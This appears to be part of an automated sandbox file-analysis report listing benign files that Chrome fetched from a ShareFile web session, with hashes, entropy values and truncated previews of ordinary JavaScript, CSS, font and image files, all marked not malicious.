                                                                                                                                                                                                                                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (65455)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):775322
                                                                                                                                                                                                                                                                                Entropy (8bit):5.700380059248383
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:12288:NvDUwwNB3iRaEYalRrszCKn74REaE3rKiJPQ+kfOJYIFAMO:iwQuqbjlkL
                                                                                                                                                                                                                                                                                MD5:ED5AEEA53278040B2022DEA269DC2B98
                                                                                                                                                                                                                                                                                SHA1:293D8B7E49DA38693EA7F73C9E0AD336E7AC6698
                                                                                                                                                                                                                                                                                SHA-256:411AD512AA6D5DA9360FF398433E0E764F0528263658E8B943E683EF8914A454
                                                                                                                                                                                                                                                                                SHA-512:54A01CC7E10665B1A112E9B550B045D001F70C2618AC87C313479A2B47AE9D38C0BD14C4EF03B84C31B318A9AEDAD2C37E3FEE9B32A968D9DD1A619597E41472
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview://@pilet v:2(webpackChunkpr_sharefiledevesignpilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router-dom","tslib"],(function(e,t){var n={},i={},o={},r={},a={},s={},l={};return Object.defineProperty(r,"__esModule",{value:!0}),{setters:[function(e){n.AccountsEntity=e.AccountsEntity,n.Api=e.Api,n.ContactListType=e.ContactListType,n.ContactsEntity=e.ContactsEntity,n.CustomWorkflowBundleType=e.CustomWorkflowBundleType,n.FileVirusStatus=e.FileVirusStatus,n.IntegrationProvider=e.IntegrationProvider,n.IntegrationsEntity=e.IntegrationsEntity,n.ItemOperations=e.ItemOperations,n.ItemOrderingMode=e.ItemOrderingMode,n.ItemsEntity=e.ItemsEntity,n.RightSignatureEntity=e.RightSignatureEntity,n.Uploader=e.Uploader,n.UserRole=e.UserRole,n.UsersEntity=e.UsersEntity,n.createFolder=e.createFolder,n.isCustomWorkflowBundle=e.isCustomWorkflowBundle,n.isFile=e.isFile,n.isFolder=e.isFolder,n.isLink=e.isLink,n.isMedicalStudyBundle=e.isMedicalStudyBundle,n
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65476)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):1165518
                                                                                                                                                                                                                                                                                Entropy (8bit):5.805744171661846
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:24576:zWiC1pr8SGV+4zP0lxKP1LkILt9aq+/8kaLduptHpEPwf:SiC1pr8SGV+4zP0BILt9m/8kaLduptHF
                                                                                                                                                                                                                                                                                MD5:B1017618BAA776FDE10E1ABB9B5576D1
                                                                                                                                                                                                                                                                                SHA1:870E1311F1D2A10A119101E906ED1F66AAF4A406
                                                                                                                                                                                                                                                                                SHA-256:58FCAC9C5EDD67ADE2937263783BF78D9C112BA862501990CFD553B7C0390647
                                                                                                                                                                                                                                                                                SHA-512:58E524C52D87BCE8EC7A127AA719B3A0664AA21F7502F3AC4238C807FE0F5F03560B9CC9A1E95C5B7F2B23B5E600E9B707DA4785DABB7F00B95F94795464FF52
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview://@pilet v:2(webpackChunkpr_sharefiledevfileviewerpilet,{}).System.register(["@sharefiledev/antd-config","antd","react","tslib"],(function(e,t){var n={},r={},i={},s={};return{setters:[function(e){n.colorPalette=e.colorPalette,n.defaultAntDConfig=e.defaultAntDConfig,n.sizes=e.sizes},function(e){r.Alert=e.Alert,r.Button=e.Button,r.Checkbox=e.Checkbox,r.Col=e.Col,r.Divider=e.Divider,r.Flex=e.Flex,r.Input=e.Input,r.Layout=e.Layout,r.Modal=e.Modal,r.Row=e.Row,r.Skeleton=e.Skeleton,r.Spin=e.Spin,r.Tree=e.Tree,r.Typography=e.Typography},function(e){i.Children=e.Children,i.Fragment=e.Fragment,i.Suspense=e.Suspense,i.createContext=e.createContext,i.createElement=e.createElement,i.default=e.default,i.forwardRef=e.forwardRef,i.isValidElement=e.isValidElement,i.lazy=e.lazy,i.useCallback=e.useCallback,i.useContext=e.useContext,i.useEffect=e.useEffect,i.useLayoutEffect=e.useLayoutEffect,i.useRef=e.useRef,i.useState=e.useState,i.version=e.version},function(e){s.__awaiter=e.__awaiter}],execute:functio
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65299)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):80663
                                                                                                                                                                                                                                                                                Entropy (8bit):5.204798779868606
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:1536:Qmw0iELO+TBR2t472RirWyKsVfK5GEfy3YJtCRv/45wZbqbXZTbYWU178:VwXza3YCl45wZODZTbYR8
                                                                                                                                                                                                                                                                                MD5:6BAF57F25796C332144ED58A2A0CD9EE
                                                                                                                                                                                                                                                                                SHA1:F7FD0F3DC84B2CF93BF81E832505A673F354E0A3
                                                                                                                                                                                                                                                                                SHA-256:82F64F62BB03C1BC1824B0F9C9E05F70DBA33E146818E63CDF5C306C8CF3DEDD
                                                                                                                                                                                                                                                                                SHA-512:5FF6240D9CA34DFE30C9CD95CB5E981823C7C0063CAD9258F8F3A0A24663401DA684844524272410673A6325FD78DB0F7E7D0FCD3844B8DB3EB9AA2613908EE8
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/js/bootstrap.bundle.min.js
                                                                                                                                                                                                                                                                                Preview:/*!. * Bootstrap v5.3.2 (https://getbootstrap.com/). * Copyright 2011-2023 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof globalThis?globalThis:t||self).bootstrap=e()}(this,(function(){"use strict";const t=new Map,e={set(e,i,n){t.has(e)||t.set(e,new Map);const s=t.get(e);s.has(i)||0===s.size?s.set(i,n):console.error(`Bootstrap doesn't allow more than one instance per element. Bound instance: ${Array.from(s.keys())[0]}.`)},get:(e,i)=>t.has(e)&&t.get(e).get(i)||null,remove(e,i){if(!t.has(e))return;const n=t.get(e);n.delete(i),0===n.size&&t.delete(e)}},i="transitionend",n=t=>(t&&window.CSS&&window.CSS.escape&&(t=t.replace(/#([^\s"#']+)/g,((t,e)=>`#${CSS.escape(e)}`))),t),s=t=>{t.dispatchEvent(new Event(i))},o=t=>!(!t||"o
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (6378)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):6490
                                                                                                                                                                                                                                                                                Entropy (8bit):5.257387004754639
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:192:y2hG7a+HNCBCQ4vk8LJQM3nRoP7uFjOsMeZ:ia+H4BC3DLJTnRoP7uUi
                                                                                                                                                                                                                                                                                MD5:FAE76DAE7784930E96292B65FEEDBC0D
                                                                                                                                                                                                                                                                                SHA1:AFFD25E6159BE1645F1FFE8CE4BAFBF8D9710C3C
                                                                                                                                                                                                                                                                                SHA-256:69B7DBF013D733F4E7A1313102219E1D58DFA5F7D95D2ED590B88D935C8B1E84
                                                                                                                                                                                                                                                                                SHA-512:6B345E391AAB93D802A5B11FEF39EB86814027124CE7A9E45CBC63007316285900B095455DF21B73F542E8C60FC38E3ADF38B01DAF35CC70E98F118C719D6A30
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview://@pilet v:2(webpackChunkpr_sharefiledevremediationpilet,{"@citrite/citrix-ui@25.46.0":"citrite-citrix-ui.js"}).System.register(["@citrite/citrix-ui@25.46.0","@sharefiledev/antd-config","antd","react","tslib"],(function(e,t){var r={},n={},o={},a={},i={};return{setters:[function(e){r.notifyError=e.notifyError,r.notifyInfo=e.notifyInfo,r.notifySuccess=e.notifySuccess},function(e){n.AntDConfigProvider=e.AntDConfigProvider,n.colorPalette=e.colorPalette},function(e){o.Button=e.Button,o.Card=e.Card,o.Col=e.Col,o.Divider=e.Divider,o.Flex=e.Flex,o.Modal=e.Modal,o.Row=e.Row,o.Space=e.Space,o.Switch=e.Switch,o.Tooltip=e.Tooltip,o.Typography=e.Typography,o.theme=e.theme},function(e){a.Fragment=e.Fragment,a.createContext=e.createContext,a.createElement=e.createElement,a.default=e.default,a.forwardRef=e.forwardRef,a.useContext=e.useContext,a.useEffect=e.useEffect,a.useRef=e.useRef,a.useState=e.useState},function(e){i.__awaiter=e.__awaiter}],execute:function(){e((()=>{var e,l,s={8569:(e,t,r)=>{"use
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):42
                                                                                                                                                                                                                                                                                Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                                MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                                SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                                SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                                SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):13593
                                                                                                                                                                                                                                                                                Entropy (8bit):4.97280201927415
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:192:TAnCInAOgwRlshkByQhvWAa4nhpI4wRls0rqP+rCW7UCg6YiYBBCW7UC/6YiYiyX:cn3gQh3huEP+rCWUXBBBCWzXBpaVI
                                                                                                                                                                                                                                                                                MD5:79E997CA126B2522CDB04FE90DF21752
                                                                                                                                                                                                                                                                                SHA1:9240FE86112391FE95C34F1E49E26C7FBC2B4722
                                                                                                                                                                                                                                                                                SHA-256:4B3A8A6F91F2F2B51FB6AB816435BD3E3B0C6622D005BA080333F49444083C85
                                                                                                                                                                                                                                                                                SHA-512:F97040E83A072F3385197118C0628C0F24693EF3C2AA98FE1F85DA80AF87A0D36825DD20301FC152E3B67011C1D83A2F08EC96C2785CC8BF54EC0AD0ABB0B2EE
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:/* ------------------------------. * -- Main Global Styling -------. * ------------------------------ */...\_pendo-guide\_ {. /* -- Overarching settings for all guides -- */.}...\_pendo-guide-container\_ {. -moz-box-shadow: 1px 1px 1px 0 rgba(0,0,0,0.2);. -webkit-box-shadow: 1px 1px 1px 0 rgba(0,0,0,0.2);..box-shadow: 1px 1px 1px 0 rgba(0,0,0,0.2);. /*padding: 40px 20px;*/. font-family: "citrixsans-regular","CitrixSans",CitrixSansRegular, Arial, sans-serif;.}...\_pendo-guide-container\_ .\_pendo-guide-content\_ {. /* -- Content area -- use for font attributes, padding, etc. */.}...\_pendo-guide-container\_ .\_pendo-guide-content\_ .pendo-header {. font-size: 24px;. .line-height: 31px;. color: #485164;. text-align: center;. .font-family: "citrixsans-semibold","citrixsans-regular","CitrixSans",CitrixSansRegular, Arial, sans-serif;. font-weight:600;. .margin-bottom: 16px;. .padding: 0;.}...\_pendo-guide-container\_ .\_pendo-guide-content\_ .pendo-subheader {. font-s
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65475)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):92422
                                                                                                                                                                                                                                                                                Entropy (8bit):5.30210223517979
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:1536:1dnFi2GOnGcqas8WOwmABk4u4tBjFH1hb6R0S3ktw1Dka3TktnLFxts1:M2aO/n4uM7Jxt0
                                                                                                                                                                                                                                                                                MD5:5D7E959E6B83248D04C1764F8F6F153E
                                                                                                                                                                                                                                                                                SHA1:9CB75E73CEE59773AC7F82C41EC4B11FB6168C37
                                                                                                                                                                                                                                                                                SHA-256:17C44981056AE13F58B412BEF7B9708B004F7A9A3F8B92366766D01181F9B386
                                                                                                                                                                                                                                                                                SHA-512:23DE25731E77863A949432E5954EB16D4912B4439FF9B1CB928A0CC3755BC4069AA106EC3D6E7E5CD444E83445D75DD9D6137C5EC6D0E92980DC9687E595D24D
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview://@pilet v:2(webpackChunkpr_sharefiledevpermissionspilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router-dom","tslib"],(function(e,t){var n={},r={},o={},i={},a={},s={},u={};return Object.defineProperty(i,"__esModule",{value:!0}),{setters:[function(e){n.AccountsEntity=e.AccountsEntity,n.ContactListType=e.ContactListType,n.ContactsEntity=e.ContactsEntity,n.UserRole=e.UserRole},function(e){r.colorPalette=e.colorPalette,r.sizes=e.sizes},function(e){o.Alert=e.Alert,o.Avatar=e.Avatar,o.Badge=e.Badge,o.Button=e.Button,o.Card=e.Card,o.Checkbox=e.Checkbox,o.Col=e.Col,o.Collapse=e.Collapse,o.Divider=e.Divider,o.Drawer=e.Drawer,o.Dropdown=e.Dropdown,o.Flex=e.Flex,o.Form=e.Form,o.Input=e.Input,o.Layout=e.Layout,o.List=e.List,o.Modal=e.Modal,o.Popconfirm=e.Popconfirm,o.Row=e.Row,o.Select=e.Select,o.Skeleton=e.Skeleton,o.Space=e.Space,o.Spin=e.Spin,o.Switch=e.Switch,o.Tooltip=e.Tooltip,o.Typography=e.Typography,o.notification=e.notification
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65476)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):1165518
                                                                                                                                                                                                                                                                                Entropy (8bit):5.805744171661846
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:24576:zWiC1pr8SGV+4zP0lxKP1LkILt9aq+/8kaLduptHpEPwf:SiC1pr8SGV+4zP0BILt9m/8kaLduptHF
                                                                                                                                                                                                                                                                                MD5:B1017618BAA776FDE10E1ABB9B5576D1
                                                                                                                                                                                                                                                                                SHA1:870E1311F1D2A10A119101E906ED1F66AAF4A406
                                                                                                                                                                                                                                                                                SHA-256:58FCAC9C5EDD67ADE2937263783BF78D9C112BA862501990CFD553B7C0390647
                                                                                                                                                                                                                                                                                SHA-512:58E524C52D87BCE8EC7A127AA719B3A0664AA21F7502F3AC4238C807FE0F5F03560B9CC9A1E95C5B7F2B23B5E600E9B707DA4785DABB7F00B95F94795464FF52
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-fileviewer-pilet/1.29.0/package/dist/index.js
                                                                                                                                                                                                                                                                                Preview://@pilet v:2(webpackChunkpr_sharefiledevfileviewerpilet,{}).System.register(["@sharefiledev/antd-config","antd","react","tslib"],(function(e,t){var n={},r={},i={},s={};return{setters:[function(e){n.colorPalette=e.colorPalette,n.defaultAntDConfig=e.defaultAntDConfig,n.sizes=e.sizes},function(e){r.Alert=e.Alert,r.Button=e.Button,r.Checkbox=e.Checkbox,r.Col=e.Col,r.Divider=e.Divider,r.Flex=e.Flex,r.Input=e.Input,r.Layout=e.Layout,r.Modal=e.Modal,r.Row=e.Row,r.Skeleton=e.Skeleton,r.Spin=e.Spin,r.Tree=e.Tree,r.Typography=e.Typography},function(e){i.Children=e.Children,i.Fragment=e.Fragment,i.Suspense=e.Suspense,i.createContext=e.createContext,i.createElement=e.createElement,i.default=e.default,i.forwardRef=e.forwardRef,i.isValidElement=e.isValidElement,i.lazy=e.lazy,i.useCallback=e.useCallback,i.useContext=e.useContext,i.useEffect=e.useEffect,i.useLayoutEffect=e.useLayoutEffect,i.useRef=e.useRef,i.useState=e.useState,i.version=e.version},function(e){s.__awaiter=e.__awaiter}],execute:functio
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (32010)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):50049
                                                                                                                                                                                                                                                                                Entropy (8bit):5.315307632257224
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:768:PFFeY2oE4e2HneiJbpJuAl39FVy7bT0tUpFk8Qgm:tIyreiBphl39FsvTpFvi
                                                                                                                                                                                                                                                                                MD5:63E2DF852D15AB21D7FF8FC4363222E8
                                                                                                                                                                                                                                                                                SHA1:7EE401BA652DB0A4EC960350E17216CDA01E22FB
                                                                                                                                                                                                                                                                                SHA-256:545156ADEAE44DADC82B98D504F805EBE77FB79C928EF34EED1057BB9D4CB8FE
                                                                                                                                                                                                                                                                                SHA-512:BAAD17C762461527B270B57EF294E28BEFF92B3A66829B8DDD8788A791AEBB0A40BE849BFC79FCFC5CB0D7FFC7FD709CA6CD6A61CAC878CE60F585D40F214970
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:!function(t,n,e){function r(e,o){if(!n[e]){if(!t[e]){var a="function"==typeof __nr_require&&__nr_require;if(!o&&a)return a(e,!0);if(i)return i(e,!0);throw new Error("Cannot find module '"+e+"'")}var s=n[e]={exports:{}};t[e][0].call(s.exports,function(n){var i=t[e][1][n];return r(i||n)},s,s.exports)}return n[e].exports}for(var i="function"==typeof __nr_require&&__nr_require,o=0;o<e.length;o++)r(e[o]);return r}({1:[function(t,n,e){var r=t(46);n.exports=function(t,n){return"addEventListener"in window?window.addEventListener(t,n,r(!1)):"attachEvent"in window?window.attachEvent("on"+t,n):void 0}},{}],2:[function(t,n,e){function r(t,n,e,r){var i=d(t,n,e);return i.stats=a(r,i.stats),i}function i(t,n,e,r,i){var a=d(t,n,e,i);return a.metrics=o(r,a.metrics),a}function o(t,n){return n||(n={count:0}),n.count+=1,v(t,function(t,e){n[t]=a(e,n[t])}),n}function a(t,n){return null==t?s(n):n?(n.c||(n=f(n.t)),n.c+=1,n.t+=t,n.sos+=t*t,t>n.max&&(n.max=t),t<n.min&&(n.min=t),n):{t:t}}function s(t){return t?t.
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):79
                                                                                                                                                                                                                                                                                Entropy (8bit):3.9951663126378123
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:U3KTDW3MiLLUHcjVXlVBT7J:H6NLgHWXZT7J
                                                                                                                                                                                                                                                                                MD5:97B958FA75E225CEA6FA3F3E399010D0
                                                                                                                                                                                                                                                                                SHA1:4DDFF887AB1D6FFC1678A717F1327E6C0900B9F8
                                                                                                                                                                                                                                                                                SHA-256:0C909725B0EA7DA9994F16E47A4142783410C5AA25CDD7770F85DC61EB8A170C
                                                                                                                                                                                                                                                                                SHA-512:C8130E21AF2E53D9B3615EAF54714A1160C0D2D80629F4EC19108F307226FA62ED9A45D415041C649A9E2BC2631AF87DD0FC88792051B82096904D3A44166882
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:NREUM.setToken({'stn':0,'err':1,'ins':1,'spa':1,'sr':0,'srs':0,'st':1,'sts':0})
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (65402)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):221391
                                                                                                                                                                                                                                                                                Entropy (8bit):5.505848799267894
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:1536:zKpp9PN6FBP6XHmOMDl1LXPOODKXJ0kouqtHnLM2wRz+BZKGG8cQfGIO8he+uJ8y:zKppRqBPywDlVhkouwnLllOqemP9Pmmg
                                                                                                                                                                                                                                                                                MD5:B5D95B131A56925ED34B1CF110473319
                                                                                                                                                                                                                                                                                SHA1:92E638C9042CEA3E57F02C110ABF2F76B69E7EE2
                                                                                                                                                                                                                                                                                SHA-256:D0AE89E960445A175B51BB797B1EBC7E144A775C377900CF4EAB1B239104A206
                                                                                                                                                                                                                                                                                SHA-512:9AC8D18DB3AFEBCB0E034154D91311411B0831C1BDE1E1DB8384B843E797B170E9880AB04E6E68AE9629E1159A2FE6E5C106E8AE145C9A9337C805B03CBE71B4
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview://@pilet v:2(webpackChunkpr_sharefiledevuseractionspilet,{"@citrite/citrix-ui@25.46.0":"citrite-citrix-ui.js"}).System.register(["@citrite/citrix-ui@25.46.0","react","react-router"],(function(e,t){var r={},n={},o={};return{setters:[function(e){r.confirmModal=e.confirmModal,r.notifyError=e.notifyError,r.notifySuccess=e.notifySuccess,r.warningConfirmModal=e.warningConfirmModal},function(e){n.createElement=e.createElement,n["default"]=e["default"]},function(e){o.useHistory=e.useHistory}],execute:function(){e((()=>{var e={9669:(e,t,r)=>{e.exports=r(1609)},5448:(e,t,r)=>{"use strict";var n=r(4867),o=r(6026),i=r(4372),s=r(5327),a=r(4097),u=r(4109),c=r(7985),l=r(7874),f=r(2648),d=r(644),p=r(205);e.exports=function(e){return new Promise((function(t,r){var h,g=e.data,m=e.headers,v=e.responseType;function y(){e.cancelToken&&e.cancelToken.unsubscribe(h),e.signal&&e.signal.removeEventListener("abort",h)}n.isFormData(g)&&n.isStandardBrowserEnv()&&delete m["Content-Type"];var b=new XMLHttpRequest;if
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:Web Open Font Format (Version 2), TrueType, length 37752, version 1.0
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):37752
                                                                                                                                                                                                                                                                                Entropy (8bit):7.994855654944988
                                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                                SSDEEP:768:dvY/hJE6cGMjUzgYbv6LlE8sW9zhOpftoexL8rWhc0z1JO9Tc0wis59:lYM6aUMe6LXsW9VOftul0z1JO9ThuT
                                                                                                                                                                                                                                                                                MD5:35D189800D56A9D8BF3D51299A974C1D
                                                                                                                                                                                                                                                                                SHA1:C07153F2F8E97706062A5D5BAD8134F5054D81FE
                                                                                                                                                                                                                                                                                SHA-256:D414E15B5454A3564168592963F45BC312C13040026AD87450B597EE5DCD11FA
                                                                                                                                                                                                                                                                                SHA-512:B110B5A40087A6D04348A043E33FA5C3465EA53C00C683A35523B532A1BF4E30845C4CBDB35B4A302EF8A00E1BD374485557572162BE566B3D431C2BDAB27313
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-dynamic-forms-pilet/1.25.0/package/dist/402b74053d26323596b3.woff2
                                                                                                                                                                                                                                                                                Preview:wOF2.......x....... .................................r..\.`..D.`..........._.6.$..T..,.. ..~..;..=[.lq..c./.jk..6.z...7"9v..U.....,a..w.i..-....OO*2fR!m7......?d.;B.!'/.....4.c$.Y1gR .Ur..."Qs../..FwO..2..=JZ{u..V.f|Q...B%./,..\.l.r...>i.mz.=..w..4F..p..a*M...5.Ncg.........>.P3.......A..Hw..!..h....c...g.)S]......Zs..&|/h.7.....@..X,.@t.K..svk2|.....v..f...R.G.y..2.....e...Bp..A..q...@..Q.r..M.2%.d...AH.tq.I...z.x.@v|..#"...s.s.[.c#.f..c.....`.G.....,.@..G..`7.Q.ZD...P.....U-f...8`.NH.B.]L.....9.yCK[?...8....ti.M...?...6....T.e...{o{.fkF...!Xym.y...U..Q.k....?..=.}.}.q.Y.8....p.....I.Ix.h.....Il.-.2P..fx.{.H.Q.O..f.a....Y.&.=....mD.k....2.2"B~...U!e\.5....t.yA ..O.$....`.9"?#&%.p+..b!....f.8.#...7.....>..l......3..\3.R.M.2S.#...s.t.......@V.a.}3=..a.R.qL*BE.Xx .^.W@..6...O..Y....Z.I.+m..=...g....`.*).\..!.....`Q.).j}4!..L........z..j..`5r../........~j.k..\.....nn..:.W|..E.A.#.d...?M........w.,....+....St..x.....>LL..-or.T.oM.2.. "........
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (46254)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):133462
                                                                                                                                                                                                                                                                                Entropy (8bit):5.386115732806718
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3072:7st4ceI7j1jcp0TRQ8Up0yRBS7pmrI8RYo:ot/n7jxcp0sp0CS7pm5
                                                                                                                                                                                                                                                                                MD5:339B13B91CE8CF7CAD214117EA302B1F
                                                                                                                                                                                                                                                                                SHA1:98F3C31699CE0C6516E366AFE421F3D941309A6A
                                                                                                                                                                                                                                                                                SHA-256:BDF4BB9CE620D4819A9D3FEB0738321607788FD880621C2A21B6DBF8CB711032
                                                                                                                                                                                                                                                                                SHA-512:277031BCF440735B1511B8C8EAC52F867631C77AF6D81BE6D531469B646B157563D2A821B5FAF41155C2E1AFBEFAFB92CF87BDA57FA1B2730791BF2276DB975A
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-dynamic-forms-pilet/1.25.0/package/dist/index.js
